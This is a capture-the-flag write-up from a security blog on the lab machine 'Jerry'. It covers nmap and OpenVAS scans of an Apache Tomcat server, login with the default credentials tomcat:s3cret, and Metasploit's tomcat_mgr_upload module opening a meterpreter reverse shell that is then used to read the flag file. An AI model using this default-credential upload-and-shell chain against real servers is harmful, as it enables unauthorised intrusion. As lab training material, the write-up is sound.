Jerry - Braincoke | Security Blog

Starting information

Machine IP : 10.10.10.95
System : Windows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

/etc/hosts

10.10.10.95 jerry

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- jerry -Pn
Not shown: 65534 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.14 seconds

There is only one open port: 8080. Now I can start nmap scripts on the open port to gather more information:

nmap -p8080 -A -Pn jerry

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Web page

Accessing http://10.10.10.95:8080 shows us a default Apache Tomcat webpage. Three buttons are of interests:

Server Status
Manager App
Host Manager

When clicking these buttons, a basic http authentication is requested. If it fails, a page with a default message is displayed:

For example, to add the admin-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

Could the administrator have used these default credentials to configure its application ? Yes, the credentials are tomcat:s3cret.

Server status

The server status page gives us a bunch of information about the server:

Tomcat Version	JVM Version	JVM Vendor	OS Name	OS Version	OS Architecture	Hostname	IP Address
Apache Tomcat/7.0.88	1.8.0_171-b11	Oracle Corporation	Windows Server 2012 R2	6.3	amd64	JERRY	10.10.10.95

Web application manager

The application manager page gives us commands to start and stop services and deploy files.

Information gathered

After scanning the ports with nmap and OpenVAS and looking at the application here is the information gathered.

Operating System

Windows

Open ports

Port	Service
8080/tcp	Apache Tomcat/7.0.88

Vulnerabilities

Here are the vulnerabilities found by OpenVAS:

Service	Description	Severity
Apache	HTTP Brute Force Logins With Default Credentials Reporting	High
Apache	Apache Tomcat Manager Remote Unauthorized Access Vulnerability	High

These two vulnerabilities report that the server uses default credentials admin:admin and tomcat:s3cret, one of which was already found.

Metasploit

The default credentials found can be used to exploit a vulnerability with metasploit. After searching for tomcat in metasploit I selected the exploit multi/http/tomcat_mgr_upload and configured it with the following parameters:

Param	Value
RPORT	8080
RHOSTS	10.10.10.95
LHOST	my ip
LPORT	4444
HttpPassword	s3cret
HttpUsername	tomcat

In the metasploit console, execute use <exploit_path> to select an exploit, and set <option_name> to configure an option.

Once everything is setup, I run exploit and get a shell:

meterpreter > getuid
Server username: JERRY$

meterpreter > sysinfo
Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

From there, the flags are already accessible:

cat ../Users/Administrator/Desktop/flags/2\ for\ the\ price\ of\ 1.txt